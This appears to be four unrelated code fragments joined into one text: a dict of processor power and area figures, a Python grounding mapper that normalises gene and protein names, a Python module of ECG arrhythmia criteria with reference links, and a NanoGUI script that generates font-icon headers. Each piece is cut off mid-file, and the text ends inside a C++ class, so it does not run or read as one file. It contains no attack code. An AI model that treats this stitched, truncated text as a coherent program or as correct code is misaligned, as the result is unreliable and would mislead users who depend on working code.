'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0470964,
'L2/Runtime Dynamic': 0.009502,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.95098,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.830005,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0554475,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0554476,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.21282,
'Load Store Unit/Runtime Dynamic': 1.1589,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.136724,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.273449,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0485238,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0490485,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.218651,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0368184,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.458116,
'Memory Management Unit/Runtime Dynamic': 0.0858669,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.4851,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0108162,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00849602,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0948037,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming | |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import csv
import sys
import pickle
from copy import deepcopy
from indra.databases import uniprot_client, hgnc_client
from itertools import groupby, chain
from collections import Counter
import logging
from indra.util import read_unicode_csv, write_unicode_csv
logger = logging.getLogger('grounding_mapper')
class GroundingMapper(object):
def __init__(self, gm):
self.gm = gm
def map_agents(self, stmts, do_rename=True):
# Make a copy of the stmts
mapped_stmts = []
num_skipped = 0
# Iterate over the statements
for stmt in stmts:
mapped_stmt = deepcopy(stmt)
# Iterate over the agents
skip_stmt = False
for agent in mapped_stmt.agent_list():
if agent is None or agent.db_refs.get('TEXT') is None:
continue
agent_text = agent.db_refs.get('TEXT')
# Look this string up in the grounding map
# If not in the map, leave agent alone and continue
try:
map_db_refs = self.gm[agent_text]
except KeyError:
continue
# If it's in the map but it maps to None, then filter out
# this statement by skipping it
if map_db_refs is None:
# Increase counter if this statement has not already
# been skipped via another agent
if not skip_stmt:
num_skipped += 1
logger.debug("Skipping %s" % agent_text)
skip_stmt = True
# If it has a value that's not None, map it and add it
else:
# Otherwise, update the agent's db_refs field
gene_name = None
map_db_refs = deepcopy(self.gm.get(agent_text))
up_id = map_db_refs.get('UP')
hgnc_sym = map_db_refs.get('HGNC')
if up_id and not hgnc_sym:
gene_name = uniprot_client.get_gene_name(up_id, False)
if gene_name:
hgnc_id = hgnc_client.get_hgnc_id(gene_name)
if hgnc_id:
map_db_refs['HGNC'] = hgnc_id
elif hgnc_sym and not up_id:
# Override the HGNC symbol entry from the grounding
# map with an HGNC ID
hgnc_id = hgnc_client.get_hgnc_id(hgnc_sym)
if hgnc_id:
map_db_refs['HGNC'] = hgnc_id
# Now get the Uniprot ID for the gene
up_id = hgnc_client.get_uniprot_id(hgnc_id)
if up_id:
map_db_refs['UP'] = up_id
# If there's no HGNC ID for this symbol, raise an
# Exception
else:
raise ValueError('No HGNC ID corresponding to gene '
'symbol %s in grounding map.' %
hgnc_sym)
# If we have both, check the gene symbol ID against the
# mapping from Uniprot
elif up_id and hgnc_sym:
# Get HGNC Symbol from Uniprot
gene_name = uniprot_client.get_gene_name(up_id)
if not gene_name:
raise ValueError('No gene name found for Uniprot '
'ID %s (expected %s)' %
(up_id, hgnc_sym))
# We got gene name, compare it to the HGNC name
else:
if gene_name != hgnc_sym:
raise ValueError('Gene name %s for Uniprot ID '
'%s does not match HGNC '
'symbol %s given in grounding '
'map.' %
(gene_name, up_id, hgnc_sym))
else:
hgnc_id = hgnc_client.get_hgnc_id(hgnc_sym)
if not hgnc_id:
raise ValueError('No HGNC ID '
'corresponding to gene '
'symbol %s in grounding '
'map.' % hgnc_sym)
# Assign the DB refs from the grounding map to the agent
agent.db_refs = map_db_refs
# Are we renaming right now?
if do_rename:
# If there's a Bioentities ID, prefer that for the name
if agent.db_refs.get('BE'):
agent.name = agent.db_refs.get('BE')
# Get the HGNC symbol or gene name (retrieved above)
elif hgnc_sym is not None:
agent.name = hgnc_sym
elif gene_name is not None:
agent.name = gene_name
# Check if we should skip the statement
if not skip_stmt:
mapped_stmts.append(mapped_stmt)
logger.info('%s statements filtered out' % num_skipped)
return mapped_stmts
def rename_agents(self, stmts):
# Make a copy of the stmts
mapped_stmts = deepcopy(stmts)
# Iterate over the statements
for stmt_ix, stmt in enumerate(mapped_stmts):
# Iterate over the agents
for agent in stmt.agent_list():
if agent is None:
continue
old_name = agent.name
# If there's a Bioentities ID, prefer that for the name
if agent.db_refs.get('BE'):
agent.name = agent.db_refs.get('BE')
# Take a HGNC name from Uniprot next
elif agent.db_refs.get('UP'):
# Try for the gene name
gene_name = uniprot_client.get_gene_name(
agent.db_refs.get('UP'),
web_fallback=False)
if gene_name:
agent.name = gene_name
hgnc_id = hgnc_client.get_hgnc_id(gene_name)
if hgnc_id:
agent.db_refs['HGNC'] = hgnc_id
# Take the text string
#if agent.db_refs.get('TEXT'):
# agent.name = agent.db_refs.get('TEXT')
# If this fails, then we continue with no change
# Fall back to the text string
#elif agent.db_refs.get('TEXT'):
# agent.name = agent.db_refs.get('TEXT')
return mapped_stmts
# TODO: handle the cases when there is more than one entry for the same
# key (e.g., ROS, ER)
def load_grounding_map(grounding_map_path, ignore_path=None):
g_map = {}
map_rows = read_unicode_csv(grounding_map_path, delimiter=',',
quotechar='"',
quoting=csv.QUOTE_MINIMAL,
lineterminator='\r\n')
if ignore_path and os.path.exists(ignore_path):
ignore_rows = read_unicode_csv(ignore_path, delimiter=',',
quotechar='"',
quoting=csv.QUOTE_MINIMAL,
lineterminator='\r\n')
else:
ignore_rows = []
csv_rows = chain(map_rows, ignore_rows)
for row in csv_rows:
key = row[0]
db_refs = {'TEXT': key}
keys = [entry for entry in row[1::2] if entry != '']
values = [entry for entry in row[2::2] if entry != '']
if len(keys) != len(values):
logger.info('ERROR: Mismatched keys and values in row %s' %
str(row))
continue
else:
db_refs.update(dict(zip(keys, values)))
if len(db_refs.keys()) > 1:
g_map[key] = db_refs
else:
g_map[key] = None
return g_map
# Some useful functions for analyzing the grounding of sets of statements
# Put together all agent texts along with their grounding
def all_agents(stmts):
agents = []
for stmt in stmts:
for agent in stmt.agent_list():
# Agents don't always have a TEXT db_refs entry (for instance
# in the case of Statements from databases) so we check for this.
if agent is not None and agent.db_refs.get('TEXT') is not None:
agents.append(agent)
return agents
def agent_texts(agents):
return [ag.db_refs.get('TEXT') for ag in agents]
def get_sentences_for_agent(text, stmts, max_sentences=None):
sentences = []
for stmt in stmts:
for agent in stmt.agent_list():
if agent is not None and agent.db_refs.get('TEXT') == text:
sentences.append((stmt.evidence[0].pmid,
stmt.evidence[0].text))
if max_sentences is not None and \
len(sentences) >= max_sentences:
return sentences
return sentences
def agent_texts_with_grounding(stmts):
allag = all_agents(stmts)
# Convert PFAM-DEF lists into tuples so that they are hashable and can
# be tabulated with a Counter
for ag in allag:
pfam_def = ag.db_refs.get('PFAM-DEF')
if pfam_def is not None:
ag.db_refs['PFAM-DEF'] = tuple(pfam_def)
refs = [tuple(ag.db_refs.items()) for ag in allag]
refs_counter = Counter(refs)
refs_counter_dict = [(dict(entry[0]), entry[1])
for entry in refs_counter.items()]
# First, sort by text so that we can do a groupby
refs_counter_dict.sort(key=lambda x: x[0].get('TEXT'))
# Then group by text
grouped_by_text = []
for k, g in groupby(refs_counter_dict, key=lambda x: x[0].get('TEXT')):
# Total occurrences of this agent text
total = 0
entry = [k]
db_ref_list = []
for db_refs, count in g:
# Check if TEXT is our only key, indicating no grounding
if list(db_refs.keys()) == ['TEXT']:
db_ref_list.append((None, None, count))
# Add any other db_refs (not TEXT)
for db, id in db_refs.items():
if db == 'TEXT':
continue
else:
db_ref_list.append((db, id, count))
total += count
# Sort the db_ref_list by the occurrences of each grounding
entry.append(tuple(sorted(db_ref_list, key=lambda x: x[2],
reverse=True)))
# Now add the total frequency to the entry
entry.append(total)
# And add the entry to the overall list
grouped_by_text.append(tuple(entry))
# Sort the list by the total number of occurrences of each unique key
grouped_by_text.sort(key=lambda x: x[2], reverse=True)
return grouped_by_text
# List of all ungrounded entities by number of mentions
def ungrounded_texts(stmts):
ungrounded = [ag.db_refs['TEXT']
for s in stmts
for ag in s.agent_list()
if ag is not None and ag.db_refs.keys() == ['TEXT']]
ungroundc = Counter(ungrounded)
ungroundc = ungroundc.items()
ungroundc.sort(key=lambda x: x[1], reverse=True)
return ungroundc
def get_agents_with_name(name, stmts):
return [ag for stmt in stmts for ag in stmt.agent_list()
if ag is not None and ag.name == name]
def save_base_map(filename, grouped_by_text):
rows = []
for group in grouped_by_text:
text_string = group[0]
for db, id, count in group[1]:
if db == 'UP':
name = uniprot_client.get_mnemonic(id)
else:
name = ''
row = [text_string, db, id, count, name]
rows.append(row)
write_unicode_csv(filename, rows, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL, lineterminator='\r\n')
def protein_map_from_twg(twg):
"""Build map of entity texts to validated protein grounding.
Looks at the grounding of the entity texts extracted from the statements
and finds proteins where there is grounding to a human protein that maps to
an HGNC name that is an exact match to the entity text. Returns a dict that
can be used to update/expand the grounding map.
"""
protein_map = {}
unmatched = 0
matched = 0
logger.info('Building grounding map for human proteins')
for agent_text, grounding_list, total_count in twg:
# If 'UP' (Uniprot) not one of the grounding entries for this text,
# then we skip it.
if not 'UP' in [entry[0] for entry in grounding_list]:
continue
# Otherwise, collect all the Uniprot IDs | |
# -*- coding: utf-8 -*-
"""
knowledge about ECG arrhythmia
Standard 12Leads ECG
--------------------
Inferior leads: II, III, aVF
Lateral leads: I, aVL, V5-6
Septal leads: aVR, V1
Anterior leads: V2-4
-----------------------------------
Chest (precordial) leads: V1-6
Limb leads: I, II, III, aVR, aVL, aVF
ECG rhythm (https://litfl.com/ecg-rhythm-evaluation/)
-----------------------------------------------------
1. On a 12 lead ECG, ECG rhythm is usually a 10 second recording from Lead II
2. 7 steps to analyze:
2.1. rate (brady < 60 bpm; 60 bpm <= normal <= 100 bpm; tachy > 100 bpm)
2.2. pattern (temporal) of QRS complex (regular or irregular; if irregular, regularly irregular or irregularly irregular)
2.3. morphology (spatial) of QRS complex (narrow <= 120 ms; wide > 120 ms)
2.4. P waves (absent or present; morphology; PR interval)
2.5. relation of P waves and QRS complexes (atrial rate and ventricular rate, AV association or AV disassociation)
2.6. onset and termination (abrupt or gradual)
(2.7. response to vagal manoeuvres)
ECG waves
---------
https://ecgwaves.com/topic/ecg-normal-p-wave-qrs-complex-st-segment-t-wave-j-point/
References
----------
[1] https://litfl.com/
[2] https://ecgwaves.com/
[3] https://ecglibrary.com/ecghome.php
[4] https://courses.cs.washington.edu/courses/cse466/13au/pdfs/lectures/ECG%20filtering.pdf
NOTE that wikipedia is NOT listed in the References
"""
from io import StringIO
import pandas as pd
from easydict import EasyDict as ED
__all__ = [
# named lead sets
"Standard12Leads",
"ChestLeads", "PrecordialLeads", "LimbLeads",
"InferiorLeads", "LateralLeads", "SeptalLeads", "AnteriorLeads",
# ECG abnormalities (arrhythmias)
"AF", "AFL", # atrial
"IAVB", "LBBB", "CLBBB", "RBBB", "CRBBB", "IRBBB", "LAnFB", "NSIVCB", "BBB", # conduction block
"PAC", "PJC", "PVC", "SPB", # premature: qrs, morphology
"LPR", "LQT", "QAb", "TAb", "TInv", # wave morphology
"LAD", "RAD", # axis
"Brady", "LQRSV", "PRWP", # qrs (RR interval, amplitude)
"SA", "SB", "NSR", "STach", # sinus
"PR", # pacer
"STD", "STE", # ST segments
]
Standard12Leads = ["I", "II", "III", "aVR", "aVL", "aVF", "V1", "V2", "V3", "V4", "V5", "V6",]
ChestLeads = [f"V{n}" for n in range(1,7)]
PrecordialLeads = ChestLeads
LimbLeads = ["I", "II", "III", "aVR", "aVL", "aVF",]
InferiorLeads = ["II", "III", "aVF",]
LateralLeads = ["I", "aVL", "V5", "V6",]
SeptalLeads = ["aVR", "V1",]
AnteriorLeads = ["V2", "V3", "V4",]
_snomedbrowser_url = "https://snomedbrowser.com/Codes/Details/"
AF = ED({ # rr, morphology
"fullname": "atrial fibrillation",
"url": [
"https://litfl.com/atrial-fibrillation-ecg-library/",
"https://en.wikipedia.org/wiki/Atrial_fibrillation#Screening",
],
"knowledge": [
"irregularly irregular rhythm",
"no P waves",
"absence of an isoelectric baseline",
"variable ventricular rate",
"QRS complexes usually < 120 ms unless pre-existing bundle branch block, accessory pathway, or rate related aberrant conduction",
"fibrillatory waves (f-wave) may be present and can be either fine (amplitude < 0.5mm) or coarse (amplitude > 0.5mm)",
"fibrillatory waves (f-wave) may mimic P waves leading to misdiagnosis",
],
})
AFL = ED({ # rr, morphology
"fullname": "atrial flutter",
"url": [
"https://litfl.com/atrial-flutter-ecg-library/",
"https://en.wikipedia.org/wiki/Atrial_flutter",
],
"knowledge": [
"a type of supraventricular tachycardia caused by a re-entry circuit within the right atrium",
"fairly predictable atrial rate (NOT equal to ventricular rate for AFL) of around 300 bpm (range 200-400)",
"fixed AV blocks, with ventricular rate a fraction (1/2,1/3,etc.) of atrial rate",
"narrow complex tachycardia (ref. supraventricular & ventricular rate)",
"flutter waves ('saw-tooth' pattern) best seen in leads II, III, aVF (may be more easily spotted by turning the ECG upside down), may resemble P waves in V1",
"loss of the isoelectric baseline", # important
],
})
Brady = ED({ # rr
"fullname": "bradycardia",
"url": [
"https://litfl.com/bradycardia-ddx/",
"https://en.wikipedia.org/wiki/Bradycardia"
],
"knowledge": [
"heart rate (ventricular rate) < 60/min in an adult",
],
})
BBB = ED({ # morphology
"fullname": "bundle branch block",
"url": [
],
"knowledge": [],
})
IAVB = ED({ # morphology
"fullname": "1st degree av block",
"url": [
"https://litfl.com/first-degree-heart-block-ecg-library/",
"https://en.wikipedia.org/wiki/Atrioventricular_block#First-degree_Atrioventricular_Block"
],
"knowledge": [
"PR interval > 200ms",
"Marked’ first degree block if PR interval > 300ms",
"P waves might be buried in the preceding T wave",
"there are no dropped, or skipped, beats",
],
})
LBBB = ED({ # morphology
"fullname": "left bundle branch block",
"url": [
"https://litfl.com/left-bundle-branch-block-lbbb-ecg-library/",
"https://en.wikipedia.org/wiki/Left_bundle_branch_block",
],
"knowledge": [
"heart rhythm must be supraventricular",
"QRS duration of > 120 ms",
"lead V1: Dominant S wave, with QS or rS complex",
"lateral leads: M-shaped, or notched, or broad monophasic R wave or RS complex; absence of Q waves (small Q waves are still allowed in aVL)",
"chest (precordial) leads: poor R wave progression",
"left precordial leads (V5-6): prolonged R wave peak time > 60ms",
"ST segments and T waves always go in the opposite direction to the main vector of the QRS complex",
],
})
CLBBB = ED({ # morphology
"fullname": "complete left bundle branch block",
"url": [
],
"knowledge": [
],
})
RBBB = ED({ # morphology
"fullname": "right bundle branch block",
"url": [
"https://litfl.com/right-bundle-branch-block-rbbb-ecg-library/",
"https://en.wikipedia.org/wiki/Right_bundle_branch_block",
],
"knowledge": [
"broad QRS > 100 ms (incomplete block) or > 120 ms (complete block)",
"leads V1-3: RSR’ pattern (‘M-shaped’ QRS complex); sometimes a broad monophasic R wave or a qR complex in V1",
"lateral leads: wide, slurred S wave",
],
})
CRBBB = ED({ # morphology
"fullname": "complete right bundle branch block",
"url": [
"https://litfl.com/right-bundle-branch-block-rbbb-ecg-library/",
"https://en.wikipedia.org/wiki/Right_bundle_branch_block",
],
"knowledge": [
"broad QRS > 120 ms",
"leads V1-3: RSR’ pattern (‘M-shaped’ QRS complex); sometimes a broad monophasic R wave or a qR complex in V1",
"lateral leads: wide, slurred S wave",
],
})
IRBBB = ED({ # morphology
"fullname": "incomplete right bundle branch block",
"url": [
"https://litfl.com/right-bundle-branch-block-rbbb-ecg-library/",
"https://en.wikipedia.org/wiki/Right_bundle_branch_block#Diagnosis",
],
"knowledge": [
"defined as an RSR’ pattern in V1-3 with QRS duration < 120ms (and > 100ms?)",
"normal variant, commonly seen in children (of no clinical significance)",
],
})
LAnFB = ED({ # morphology
"fullname": "left anterior fascicular block",
"url": [
"https://litfl.com/left-anterior-fascicular-block-lafb-ecg-library/",
"https://en.wikipedia.org/wiki/Left_anterior_fascicular_block",
],
"knowledge": [
"inferior leads (II, III, aVF): small R waves, large negative voltages (deep S waves), i.e. 'rS complexes'",
"left-sided leads (I, aVL): small Q waves, large positive voltages (tall R waves), i.e. 'qR complexes'",
"slight widening of the QRS",
"increased R wave peak time in aVL",
"LAD of degree (-45°, -90°)"
],
})
LQRSV = ED({ # voltage
"fullname": "low qrs voltages",
"url": [
"https://litfl.com/low-qrs-voltage-ecg-library/",
"https://www.healio.com/cardiology/learn-the-heart/ecg-review/ecg-topic-reviews-and-criteria/low-voltage-review",
],
"knowledge": [
"peak-to-peak (VERY IMPORTANT) amplitudes of all the QRS complexes in the limb leads are < 5mm (0.5mV); or amplitudes of all the QRS complexes in the precordial leads are < 10mm (1mV)",
],
})
PRWP = ED({ # voltage
"fullname": "poor R wave progression",
"url": [
"https://litfl.com/poor-r-wave-progression-prwp-ecg-library/",
"https://www.healio.com/cardiology/learn-the-heart/ecg-review/ecg-topic-reviews-and-criteria/poor-r-wave-progression",
"https://emergencymedicinecases.com/ecg-cases-poor-r-wave-progression-late-mnemonic/",
"https://www.wikidoc.org/index.php/Poor_R_Wave_Progression",
],
"knowledge": [ #The definition of poor R wave progression (PRWP) varies in the literature
"absence of the normal increase in size of the R wave in the precordial leads when advancing from lead V1 to V6",
"in lead V1, the R wave should be small. The R wave becomes larger throughout the precordial leads, to the point where the R wave is larger than the S wave in lead V4. The S wave then becomes quite small in lead V6.",
"failure of the R wave to progress in amplitude (R<3mm in V3), reversal of the progression (eg R in V2>V3), or delayed transition beyond V4",
"R wave is less than 2–4 mm in leads V3 or V4 and/or there is presence of a reversed R wave progression, which is defined as R in V4 < R in V3 or R in V3 < R in V2 or R in V2 < R in V1, or any combination of these",
],
})
NSIVCB = ED({ # mophology
"fullname": "nonspecific intraventricular conduction disorder",
"url": [
"https://ecgwaves.com/topic/nonspecific-intraventricular-conduction-delay-defect/",
"https://www.dynamed.com/condition/intraventricular-conduction-disorders-including-left-and-right-bundle-branch-block-lbbb-and-rbbb",
"https://www.sciencedirect.com/science/article/pii/S0735109708041351",
"https://www.heartrhythmjournal.com/article/S1547-5271(15)00073-9/abstract",
],
"knowledge": [
"widended (> 110ms) QRS complex, with not meeting the criteria (morphology different from) for LBBB and RBBB",
],
})
PR = ED({ # morphology
"fullname": "pacing rhythm",
"url": [
"https://litfl.com/pacemaker-rhythms-normal-patterns/",
"https://www.youtube.com/watch?v=YkB4oX_COi8",
],
"knowledge": [
"morphology is dependent on the pacing mode (AAI, VVI, DDD, Magnet) used",
"there are pacing spikes: vertical spikes of short duration, usually 2 ms (in doubt, viewing signals of the CINC2020 dataset, probably 10-20ms(at most half a small grid)?)", # important
"AAI (atrial pacing): pacing spike precedes the p wave",
"VVI (ventricle pacing): pacing spike precedes the QRS complex; morphology similar to LBBB or RBBB (depending on lead placement)",
],
})
PAC = ED({ # morphology, very complicated
"fullname": "premature atrial contraction",
"url": [
"https://litfl.com/premature-atrial-complex-pac/",
"https://en.wikipedia.org/wiki/Premature_atrial_contraction",
],
"knowledge": [
"an abnormal (non-sinus) P wave is followed by a QRS complex",
"P wave typically has a different morphology and axis to the sinus P waves",
"abnormal P wave may be hidden in the preceding | |
#!/usr/bin/env python3
import os
import codecs
from io import BytesIO
import re
import sys
import textwrap
# vvv These are updated by ./manufacture.py
EXPECTED_NUM_ICONS = 929
FONT_NAME = "fontawesome"
FONT_LICENSE = "CC-BY-SA 4.0: https://github.com/FortAwesome/Font-Awesome/blob/master/LICENSE.txt"
# ^^^ These are updated by ./manufacture.py
if __name__ == "__main__":
# Make sure we're in the same directory to avoid overwriting things
file_loc = os.path.dirname(os.path.abspath(__file__))
curr_dir = os.path.abspath(os.getcwd())
if file_loc != curr_dir:
sys.stderr.write(
"Please execute this script in directory [{0}]\n".format(file_loc)
)
sys.exit(1)
# Make sure the CSS file exists / has been generated
css_file = os.path.abspath(
os.path.join(
file_loc,
"compiled_fonts",
FONT_NAME,
"{name}.css".format(name=FONT_NAME)
)
)
if not os.path.exists(css_file):
sys.stderr.write(
"[{0}] does not exist. Make sure you already generated it (with `rake`).\n".format(
css_file
)
)
sys.exit(1)
# Generate header file
cdefs = []
num_matches = 0
longest = 0
try:
# fontcusom generates something like
# .fontname-icon-location:before { content: "\e724"; }
icon_re = re.compile(r'\.{name}-icon-(.+):before {{ content: "\\(.+)"; }}'.format(name=FONT_NAME))
with codecs.open(css_file, "r", "utf-8") as css:
for line in css:
match = icon_re.match(line)
if match:
num_matches += 1
icon_name, icon_code = match.groups()
icon_def = "#define {font}_ICON_{icon}".format(
font=FONT_NAME.upper(),
icon=icon_name.replace("-", "_").upper()
)
# {code:0>8} format spec says using code variable, align it to
# the right and make it a fixed width of 8 characters, padding
# with a 0. AKA zero-fill on the left until 8 char long
icon_code = "0x{code:0>8}".format(code=icon_code.upper())
cdefs.append((icon_name, icon_def, icon_code))
longest = max(longest, len(icon_def))
except Exception as e:
sys.stderr.write(
"Critical: error processing file [{0}]: {1}\n".format(css_file, e)
)
sys.exit(1)
if num_matches == EXPECTED_NUM_ICONS:
print("Found exactly [{0}] icons, as expected.".format(num_matches))
else:
sys.stderr.write(
"Found [{0}] icons, expected [{1}]\n".format(num_matches,
EXPECTED_NUM_ICONS)
)
sys.exit(1)
if not os.path.isdir("nanogui"):
try:
os.mkdir("nanogui")
except Exception as e:
sys.stderr.write(
"Critical: could not make directory ./nanogui: {0}\n".format(e)
)
sys.exit(1)
containment = "nanogui/{name}".format(name=FONT_NAME)
if not os.path.isdir(containment):
try:
os.mkdir(containment)
except Exception as e:
sys.stderr.write(
"Critical: could not make directory {0}: {1}\n".format(
containment, e
)
)
sys.exit(1)
font_header_file_path = "{containment}/{name}.h".format(
containment=containment, name=FONT_NAME
)
try:
font_header_file = open(font_header_file_path, "w")
font_header_file.write(textwrap.dedent(r'''
/*
NanoGUI was developed by <NAME> <<EMAIL>>.
The widget drawing code is based on the NanoVG demo application
by <NAME>.
All rights reserved. Use of this source code is governed by a
BSD-style license that can be found in the LICENSE.txt file.
This file represents the constants that can be used provided by the
{name} font.
License: {license}
*/
/* Developer note: need to make a change to this file?
* Please raise an Issue on GitHub describing what needs to change. This file
* was generated, so the scripts that generated it need to update as well.
*/
#pragma once
'''.format(
name=FONT_NAME,
license=FONT_LICENSE
).replace("\n", "", 1))) # remove empty line at top
font_python_bindings_path = "{containment}/constants_{name}.cpp".format(
containment=containment, name=FONT_NAME
)
font_python_bindings = open(font_python_bindings_path, "w")
font_python_bindings.write(textwrap.dedent('''
#ifdef NANOGUI_PYTHON
#include "python.h"
#include <nanogui/{name}.h>
/* Python bindings for the {name} font.
*
* License: {license}
*/
/* Developer note: need to make a change to this file?
* Please raise an Issue on GitHub describing what needs to change. This file
* was generated, so the scripts that generated it need to update as well.
*/
void register_constants_{name}(py::module &m) {{
/* bindings for the {name} font */
{{
#define C(name) g.attr("ICON_" #name) = py::int_({NAME}_ICON_##name);
py::module g = m.def_submodule("{name}");
'''.format(
name=FONT_NAME,
NAME=FONT_NAME.upper(),
license=FONT_LICENSE
)))
# Generate the full header file / python bindings
for icon_name, icon_def, icon_code in cdefs:
# icon_def is `#define {FONT_NAME.upper()}_ICON_X`
# Generate the header file #define directive
font_header_file.write("{definition:<{longest}} {code}\n".format(
definition=icon_def,
longest=longest,
code=icon_code
))
# Generate the python binding
cpp_def = icon_def.split(" ")[1]
py_def = cpp_def.split("{NAME}_ICON_".format(NAME=FONT_NAME.upper()))[1]
pybind = "C({0});".format(py_def)
py_name = "ICON_{0}".format(py_def)
font_python_bindings.write(" {pybind}\n".format(pybind=pybind))
# close the pybind
font_python_bindings.write(textwrap.dedent('''
#undef C
}
}
#endif
'''))
font_header_file.close()
font_python_bindings.close()
# generate the example icon programs
cpp_example_path = "{containment}/example_{name}.cpp".format(
containment=containment, name=FONT_NAME
)
cpp_example = open(cpp_example_path, "w")
# write the header of the cpp example
cpp_example.write(textwrap.dedent(r'''
/* Developer note: need to make a change to this file?
* Please raise an Issue on GitHub describing what needs to change. This file
* was generated, so the scripts that generated it need to update as well.
*/
#include <nanogui/nanogui.h>
#include <nanogui/resources.h>
#include <nanogui/{name}.h>
using namespace nanogui;
// Custom theme for loading the {name} font
class {Name}Theme : public nanogui::Theme {{
public:
// This override informs NanoGUI to use this as the icon font.
virtual std::string defaultIconFont() const override {{ return "{name}"; }}
{Name}Theme(NVGcontext *ctx) : nanogui::Theme(ctx) {{
// load the {name} font into memory
m{Name}Font = nanogui::createFontMem(ctx, "{name}", "{name}.ttf");
if (m{Name}Font == -1)
throw std::runtime_error("Could not load the {name} font!");
// TODO: you need to override the following default icon choices in your
// own application! See documentation for nanogui::Theme.
// mCheckBoxIcon = ENTYPO_ICON_CHECK;
// mCheckBoxIconExtraScale = defaultCheckBoxIconExtraScale();
// mMessageInformationIcon = ENTYPO_ICON_INFO_WITH_CIRCLE;
// mMessageQuestionIcon = ENTYPO_ICON_HELP_WITH_CIRCLE;
// mMessageWarningIcon = ENTYPO_ICON_WARNING;
// mMessageAltButtonIcon = ENTYPO_ICON_CIRCLE_WITH_CROSS;
// mMessagePrimaryButtonIcon = ENTYPO_ICON_CHECK;
// mPopupChevronRightIcon = ENTYPO_ICON_CHEVRON_RIGHT;
// mPopupChevronLeftIcon = ENTYPO_ICON_CHEVRON_LEFT;
// mPopupIconExtraScale = defaultPopupIconExtraScale();
// mTabHeaderLeftIcon = ENTYPO_ICON_ARROW_BOLD_LEFT;
// mTabHeaderRightIcon = ENTYPO_ICON_ARROW_BOLD_RIGHT;
// mTextBoxUpIcon = ENTYPO_ICON_CHEVRON_UP;
// mTextBoxDownIcon = ENTYPO_ICON_CHEVRON_DOWN;
// mTextBoxIconExtraScale = defaultTextBoxIconExtraScale();
}}
virtual ~{Name}Theme() {{ /* nothing to free */ }}
protected:
int m{Name}Font = -1;
}};
class {Name}Screen : public nanogui::Screen {{
public:
{Name}Screen(const Vector2i &size, const std::string &title, bool resizable)
: nanogui::Screen(size, title, resizable) {{
m{Name}Theme = new {Name}Theme(this->mNVGContext);
this->setTheme(m{Name}Theme);
}}
virtual ~{Name}Screen() {{ /* nothing to free */ }}
// allow <ESCAPE> to exit
virtual bool keyboardEvent(int key, int scancode, int action, int modifiers) override {{
if (key == GLFW_KEY_ESCAPE && modifiers == 0) {{
setVisible(false);
return true;
}}
return Screen::keyboardEvent(key, scancode, action, modifiers);
}}
protected:
nanogui::ref<{Name}Theme> m{Name}Theme;
}};
// Convenience macro for creating an IconBox. Make sure you put a semicolon after the call to this macro!
#define ADD_ICON(parent, icon, boxWidth) \
new IconBox(parent, #icon, icon, boxWidth)
class IconBox : public Widget {{
public:
